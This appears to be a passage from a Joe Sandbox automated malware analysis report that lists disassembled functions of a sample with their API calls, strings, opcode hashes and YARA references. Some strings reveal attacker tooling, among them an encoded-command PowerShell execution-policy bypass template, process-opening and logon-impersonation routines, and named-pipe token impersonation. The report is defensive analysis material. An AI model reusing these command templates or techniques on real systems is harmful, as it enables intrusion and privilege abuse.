                                            • Instruction Fuzzy Hash: E861F36230478586DF25DF269444B6B7B91FB99BC8F048125EE4B57B85EF3CCA06CB10
                                            Function 007B460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007B46A9
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • malloc.LIBCMT ref: 007B46B3
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF318
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF31D
                                            • malloc.LIBCMT ref: 007B46BE
                                            • free.LIBCMT ref: 007B487E
                                            • free.LIBCMT ref: 007B4886
                                            • free.LIBCMT ref: 007B488E
                                              • Part of subcall function 007B54F0: malloc.LIBCMT ref: 007B553A
                                              • Part of subcall function 007B54F0: malloc.LIBCMT ref: 007B5545
                                              • Part of subcall function 007B54F0: free.LIBCMT ref: 007B562C
                                              • Part of subcall function 007B54F0: free.LIBCMT ref: 007B5634
                                            • free.LIBCMT ref: 007B489A
                                            • free.LIBCMT ref: 007B48A7
                                            • free.LIBCMT ref: 007B48B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                            • String ID:
                                            • API String ID: 3534990644-0
                                            • Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                            • Instruction ID: 089b0f9577fd3fa523c39708c6d197d15114352a5b3c666d9a34c0d541654f55
                                            • Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
                                            • Instruction Fuzzy Hash: 2761EE227147C586DF25EF669854BAE7B92FB85BC8F404129DE4A47B16EF3CC806CB00
                                            Function 0076BE74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 296COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007753EC: malloc.LIBCMT ref: 00775408
                                            • malloc.LIBCMT ref: 0076BF3B
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                              • Part of subcall function 0077B630: _time64.LIBCMT ref: 0077B654
                                              • Part of subcall function 0077B630: malloc.LIBCMT ref: 0077B69C
                                              • Part of subcall function 0077B630: strtok.LIBCMT ref: 0077B700
                                              • Part of subcall function 0077B630: strtok.LIBCMT ref: 0077B711
                                              • Part of subcall function 007728A0: _time64.LIBCMT ref: 007728AE
                                              • Part of subcall function 0077DEA8: malloc.LIBCMT ref: 0077DEF8
                                              • Part of subcall function 0077DEA8: realloc.LIBCMT ref: 0077DF07
                                            • malloc.LIBCMT ref: 0076C04A
                                            • _snprintf.LIBCMT ref: 0076C0C1
                                            • _snprintf.LIBCMT ref: 0076C0E7
                                            • _snprintf.LIBCMT ref: 0076C10E
                                            • free.LIBCMT ref: 0076C2C6
                                              • Part of subcall function 0077A144: malloc.LIBCMT ref: 0077A178
                                              • Part of subcall function 0077A144: free.LIBCMT ref: 0077A32F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc$_snprintf$_errno_time64freestrtok$_callnewhrealloc
                                            • String ID: /'); %s
                                            • API String ID: 1314452303-1283008465
                                            • Opcode ID: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                            • Instruction ID: a26bfcfefbe1a90004a22c08501f445a6ca093f9f18ed11881b5c2f091109eb9
                                            • Opcode Fuzzy Hash: a14b20026d747f2b5753e6fc705179295a1c2f23b63bad27e5059ac536f54d83
                                            • Instruction Fuzzy Hash: 63A1A261700681C6EF15FB72A85976E3395BB8A7C4F848125AE5E4B796DF3CC806C702
                                            Function 007CB47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                            • malloc.LIBCMT ref: 007CB528
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                              • Part of subcall function 007CEAA8: malloc.LIBCMT ref: 007CEAF8
                                            • GetComputerNameExA.KERNEL32 ref: 007CB5EA
                                            • GetComputerNameA.KERNEL32 ref: 007CB61F
                                            • GetUserNameA.ADVAPI32 ref: 007CB654
                                              • Part of subcall function 007BF014: WSASocketA.WS2_32 ref: 007BF042
                                            • malloc.LIBCMT ref: 007CB76D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                                            • String ID: VUUU
                                            • API String ID: 632458648-2040033107
                                            • Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                            • Instruction ID: cd9d08a487f8e7bb0d409d52c3e2f65560b2214f834c56e797ff034200196790
                                            • Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
                                            • Instruction Fuzzy Hash: B591E426700690C6DF14EB66D85ABAD23A2BB89BC5F84802EFD4A5B755DF3CC906C340
                                            Function 0076E004 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf
                                            • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                                            • API String ID: 3512837008-1250630670
                                            • Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                            • Instruction ID: a7d42e42c06d430c0da474a3c8c78b0cc935ebfe6d4f0272eb4353d5cfe7b17d
                                            • Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
                                            • Instruction Fuzzy Hash: 45719C76B18B85C6EB10DB65E8843AD37A1F789788F848522EE4E03768DF3CD909C751
                                            Function 007C1478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                            • GetStartupInfoA.KERNEL32 ref: 007C1540
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFE81
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFEA9
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C15CD
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C15DC
                                            • CreateProcessWithLogonW.ADVAPI32 ref: 007C1637
                                            • GetLastError.KERNEL32 ref: 007C1641
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                            • String ID: %s as %s\%s: %d
                                            • API String ID: 3435635427-816037529
                                            • Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                            • Instruction ID: 50b0568b5a1342399e6b69f48b377cb486f46cf921a4b87f47328fdafc00d653
                                            • Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
                                            • Instruction Fuzzy Hash: 70513D32608B8186D760DF16F88475AB7A5F789B80F544129EF8D97B29DF3CD456CB00
                                            Function 00770A94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007753EC: malloc.LIBCMT ref: 00775408
                                              • Part of subcall function 0077FA20: _errno.LIBCMT ref: 0077F977
                                              • Part of subcall function 0077FA20: _invalid_parameter_noinfo.LIBCMT ref: 0077F982
                                            • fseek.LIBCMT ref: 00770B30
                                              • Part of subcall function 007802A4: _errno.LIBCMT ref: 007802CC
                                              • Part of subcall function 007802A4: _invalid_parameter_noinfo.LIBCMT ref: 007802D7
                                            • _ftelli64.LIBCMT ref: 00770B38
                                              • Part of subcall function 00780318: _errno.LIBCMT ref: 00780336
                                              • Part of subcall function 00780318: _invalid_parameter_noinfo.LIBCMT ref: 00780341
                                            • fseek.LIBCMT ref: 00770B48
                                              • Part of subcall function 007802A4: _fseek_nolock.LIBCMT ref: 007802F5
                                            • malloc.LIBCMT ref: 00770B88
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                              • Part of subcall function 0076C444: malloc.LIBCMT ref: 0076C457
                                            • fclose.LIBCMT ref: 00770C45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$_callnewh_fseek_nolock_ftelli64fclose
                                            • String ID: mode
                                            • API String ID: 1756087678-2976727214
                                            • Opcode ID: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                            • Instruction ID: abdb57ccf88e4848dba5e2871539b863ed1d08d3b0683a4dbefa2085db33ea57
                                            • Opcode Fuzzy Hash: f827565397daa4a866320a6784096609c7711a7c42725b9a2a2b01c24697e092
                                            • Instruction Fuzzy Hash: DF41AF22714680C2DE54EB22E86936EB752F7C9BD0F90C226EE6E47B95DE3CC505CB41
                                            Function 00778620 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 87COMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 0077864F
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • _snprintf.LIBCMT ref: 00778667
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • free.LIBCMT ref: 0077867E
                                              • Part of subcall function 0077E644: _errno.LIBCMT ref: 0077E664
                                            • malloc.LIBCMT ref: 007786CE
                                            • _snprintf.LIBCMT ref: 007786E6
                                            • free.LIBCMT ref: 0077870E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                            • String ID: /'); %s
                                            • API String ID: 761449704-1283008465
                                            • Opcode ID: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                            • Instruction ID: f89de91aedde07110f5ebde8f3864926e2c88e116ace3ec3337e4f957aeff3a4
                                            • Opcode Fuzzy Hash: 6cfeb8f42d39390d21f7f655b5309285a784ce0f998201f3a4c834a9ff33a05d
                                            • Instruction Fuzzy Hash: 5E31F5113482C245DE199B63AC183A56B21B78AFD0F88C151DEEE07BA6CE3CE462C300
                                            Function 007CE98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$OpenProcessToken
                                            • String ID:
                                            • API String ID: 2009710997-0
                                            • Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                            • Instruction ID: d3956885e25113edbc88a3fb45a86e64caf9a95f0ae2b9cb5cdd71c4da13d9cf
                                            • Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
                                            • Instruction Fuzzy Hash: 5121D836708B4086EB24AF62E854B6E6790EBC8B94F14403CEE4E43B56DF7CC446CB40
                                            Function 0077F210 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 0077F236
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0077F242
                                            • __crtIsPackagedApp.LIBCMT ref: 0077F253
                                            • _dosmaperr.LIBCMT ref: 0077F29D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2917016420-0
                                            • Opcode ID: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                            • Instruction ID: 57ed3b5b45a731e8d0ce74fc714e8c6dbae1f6a3aae33f8454dc40737c051c17
                                            • Opcode Fuzzy Hash: 6bd0c9401fb351ee2ef62b7ec5c1d05d22ccd8d85f9d07845cb75c559d0d09e7
                                            • Instruction Fuzzy Hash: 4F21BD76704B4182EF10AF66A90932DA6E5FB89BE4F588634DE4D43796DF3CC5418700
                                            Function 0078EFD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078F004
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 0078F01F
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0078F02A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3191669884-0
                                            • Opcode ID: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                            • Instruction ID: d69a187b2db226828676a25fd1057fc4b88d53654fc28c90108908444e93502e
                                            • Opcode Fuzzy Hash: 17da934d4d304edacbb08e48815c32878d4d79cd43a7a40298e59a88dbb9cc3b
                                            • Instruction Fuzzy Hash: AB21A172784784CAD710AF12D48866DB7A4F788BE0F588135EF5847B46CB7DC882C710
                                            Function 007DFBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007DFC04
                                              • Part of subcall function 007D1600: _getptd.LIBCMT ref: 007D1616
                                              • Part of subcall function 007D1600: __updatetlocinfo.LIBCMT ref: 007D164B
                                              • Part of subcall function 007D1600: __updatetmbcinfo.LIBCMT ref: 007D1672
                                            • _errno.LIBCMT ref: 007DFC1F
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007DFC2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3191669884-0
                                            • Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                            • Instruction ID: 46dff935e612891871bddde424c8d08812426592cab3d57a99c1906522c17ee8
                                            • Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
                                            • Instruction Fuzzy Hash: 93219C72314788CAD7109F22E58465DB7B4F798BE4F684132EE5A07B55CB3CC892CB20
                                            Function 007C596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTickioctlsocket
                                            • String ID:
                                            • API String ID: 3686034022-0
                                            • Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                            • Instruction ID: a958c504230960c36f44cc8696c5d0ad7b152fa8dcb46d9a05cb6528b2798cc4
                                            • Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
                                            • Instruction Fuzzy Hash: 7611E931708EC486E7108B69E8447597364E788BB4F50026CDA5E86AA5DFBDFCCAC714
                                            Function 007C0AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
                                            • String ID:
                                            • API String ID: 4232080776-0
                                            • Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                            • Instruction ID: cc158a088baffc6c89cb349e249b46b462ee9b8d5636fd396c3f1108b70ef33d
                                            • Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
                                            • Instruction Fuzzy Hash: 61119136A19A85C6F751DF21EC44B7A3369FB88B44F84412E890E425B2CF3CD84AC795
                                            Function 0077FF10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                            • String ID:
                                            • API String ID: 2328795619-0
                                            • Opcode ID: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                            • Instruction ID: b25b247ec064dcb98f28ae2401c5d3b05084f5893792fa1a6072a3c6981b1a68
                                            • Opcode Fuzzy Hash: a6b8c894bc097219f3410178b0f3ee4aa495d15850340b6c84f373b071b042dd
                                            • Instruction Fuzzy Hash: 4F516632744354C69F18AA269A0476EB690B385BF4F188725EE3D43FD4CF3CC89A8380
                                            Function 007D0B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                            • String ID:
                                            • API String ID: 2328795619-0
                                            • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                            • Instruction ID: 91a5c9a06328b502b94d9a92db21fda2bb832cd8c6ee0acd1cbd8b53e5cc9c6f
                                            • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                            • Instruction Fuzzy Hash: F7519B7171835086DB188A7699047AAB671F780BF8F246727AE7D43BD4CB3CD89283D0
                                            Function 00771030 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 150COMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 00771063
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                              • Part of subcall function 0076C444: malloc.LIBCMT ref: 0076C457
                                            • free.LIBCMT ref: 0077115E
                                            • free.LIBCMT ref: 0077116B
                                              • Part of subcall function 0077E644: _errno.LIBCMT ref: 0077E664
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$freemalloc$_callnewh
                                            • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                                            • API String ID: 2029259483-317027030
                                            • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                            • Instruction ID: 3c651bd4159e380e58f2ed1f42bc9d4e387bb35312b37dd0f7a8d3f827d5b73b
                                            • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                            • Instruction Fuzzy Hash: 3B519D72708791C6DB10DB65E8453AEA7A2F384BD4F908016EE8E47B58EF7CD619CB40
                                            Function 007DA348 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _mtinitlocknum.LIBCMT ref: 007DA375
                                              • Part of subcall function 007D3E58: _FF_MSGBANNER.LIBCMT ref: 007D3E75
                                              • Part of subcall function 007D3E58: _NMSG_WRITE.LIBCMT ref: 007D3E7F
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 007DA3F8
                                            • EnterCriticalSection.KERNEL32 ref: 007DA414
                                            • LeaveCriticalSection.KERNEL32 ref: 007DA424
                                            • _calloc_crt.LIBCMT ref: 007DA49A
                                            • __lock_fhandle.LIBCMT ref: 007DA502
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                            • String ID:
                                            • API String ID: 445582508-0
                                            • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                            • Instruction ID: 2d9044158b8040b5af5a71944785d6eb7b825736bae86f61e078f4aff0632ac0
                                            • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                            • Instruction Fuzzy Hash: 8951F432604B8092DB20CF24D44832DB7B9FB98B58F19412BDE8E477A4DBBCD852C702
                                            Function 007C1694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                              • Part of subcall function 007D0620: _errno.LIBCMT ref: 007D0577
                                              • Part of subcall function 007D0620: _invalid_parameter_noinfo.LIBCMT ref: 007D0582
                                            • fseek.LIBCMT ref: 007C1730
                                              • Part of subcall function 007D0EA4: _errno.LIBCMT ref: 007D0ECC
                                              • Part of subcall function 007D0EA4: _invalid_parameter_noinfo.LIBCMT ref: 007D0ED7
                                            • _ftelli64.LIBCMT ref: 007C1738
                                              • Part of subcall function 007D0F18: _errno.LIBCMT ref: 007D0F36
                                              • Part of subcall function 007D0F18: _invalid_parameter_noinfo.LIBCMT ref: 007D0F41
                                            • fseek.LIBCMT ref: 007C1748
                                              • Part of subcall function 007D0EA4: _fseek_nolock.LIBCMT ref: 007D0EF5
                                            • GetFullPathNameA.KERNEL32 ref: 007C176B
                                            • malloc.LIBCMT ref: 007C1788
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
